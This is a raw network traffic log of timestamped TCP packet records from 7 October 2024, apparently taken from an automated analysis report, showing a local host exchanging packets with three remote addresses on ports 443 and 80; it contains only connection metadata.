                                                                                                                                                                    Oct 7, 2024 14:53:13.046047926 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.046067953 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.046119928 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.046119928 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.046139002 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.046642065 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.046663046 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.046765089 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.046782017 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.046813965 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.046977997 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.046998978 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.047029972 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.047044039 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.047074080 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.047096014 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.047667980 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.047692060 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.047745943 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.047745943 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.047764063 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.047795057 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.048918009 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.048939943 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.048986912 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.049007893 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.049031973 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.130510092 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.130547047 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.130708933 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.130708933 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.130708933 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.130795002 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.132965088 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.132997036 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.133039951 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.133065939 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.133095026 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.133095026 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.134533882 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.134566069 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.134628057 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.134650946 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.134674072 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.136465073 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.136501074 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.136547089 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.136564970 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.136591911 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.137113094 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.137145042 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.137186050 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.137201071 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.137228012 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.137398958 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.137428999 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.137471914 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.137471914 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.137489080 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.137548923 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.138096094 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.138129950 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.138175011 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.138194084 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.138216972 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.139442921 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.139480114 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.139516115 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.139529943 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.139559984 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.139559984 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.221014023 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.221050024 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.221216917 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.221218109 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.221218109 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.221304893 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.223207951 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.223244905 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.223289967 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.223290920 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.223311901 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.225434065 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.225466967 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.225514889 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.225536108 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.225559950 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.227245092 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.227277994 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.227324009 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.227344990 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.227365971 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.227370024 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.227411032 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.227423906 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.227437973 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.227473974 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.227493048 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.227551937 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.227590084 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.227601051 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.227626085 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.227638006 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.227660894 CEST44349174185.199.111.133192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.227663994 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.227710962 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.227710962 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.227817059 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.230288029 CEST49174443192.168.2.22185.199.111.133
                                                                                                                                                                    Oct 7, 2024 14:53:13.316051006 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:13.321312904 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.321455956 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:13.321748972 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:13.326590061 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.391045094 CEST4434917514.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.391133070 CEST4434917514.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.391230106 CEST49175443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:53:13.391247988 CEST4434917514.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.439068079 CEST4434917514.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.439176083 CEST49175443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:53:13.439193010 CEST4434917514.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.439449072 CEST4434917514.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.439568996 CEST49175443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:53:13.440262079 CEST49175443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:53:13.440279007 CEST4434917514.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:13.440291882 CEST49175443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:53:13.440298080 CEST4434917514.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.130791903 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.130815983 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.130831957 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.130846977 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.130858898 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.130865097 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.130891085 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.324438095 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.324484110 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.324501038 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.324517012 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.324532986 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.324547052 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.324563980 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.324582100 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.324641943 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.325098038 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.325117111 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.325125933 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.325133085 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.326672077 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.518390894 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.518420935 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.518454075 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.518476963 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.518482924 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.518492937 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.518507957 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.518520117 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.518522978 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.518538952 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.518544912 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.518554926 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.518578053 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.519360065 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.519401073 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.519414902 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.519432068 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.519457102 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.519469976 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.519480944 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.519517899 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.561552048 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.600955963 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.712094069 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.712120056 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.712136030 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.712150097 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.712153912 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.712167978 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.712177038 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.712218046 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.712322950 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.712357998 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.712373972 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.712399006 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.712400913 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.712440014 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.712446928 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.713217020 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.713251114 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.713260889 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.713268042 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.713283062 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.713299990 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.713308096 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.713349104 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.714082956 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.714124918 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.714142084 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.714158058 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.714168072 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.714200974 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.905261040 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.905313969 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.905328035 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.905356884 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.905364037 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.905371904 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.905395985 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.906351089 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.906388044 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.906398058 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.906403065 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.906419039 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.906438112 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.906445980 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.906452894 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.906469107 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.906476021 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.906502008 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.906987906 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.907032967 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.907047987 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.907072067 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.907110929 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.907125950 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.907149076 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.907888889 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.907934904 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.907939911 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.907968998 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.907985926 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.908001900 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.908021927 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.908040047 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.908874035 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.908894062 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.908910990 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:14.908940077 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:14.910598993 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.099278927 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.099311113 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.099323988 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.099334955 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.099348068 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.099359035 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.099370956 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.099381924 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.099406004 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.099416971 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.099433899 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.099533081 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.099533081 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.099533081 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.099533081 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.099906921 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.099941015 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.099952936 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.099956989 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.099992990 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.099997044 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.100003958 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.100040913 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.100119114 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.100133896 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.100172043 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.100816965 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.100852013 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.100866079 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.100898981 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.100907087 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.100920916 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.100931883 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.100955009 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.100965023 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.101015091 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.101651907 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.101706028 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.101717949 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.101763964 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.101768970 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.101777077 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.101788998 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.101800919 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.101839066 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.101839066 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.102561951 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.102601051 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.102652073 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.292567968 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.292640924 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.292650938 CEST804917638.240.44.9192.168.2.22
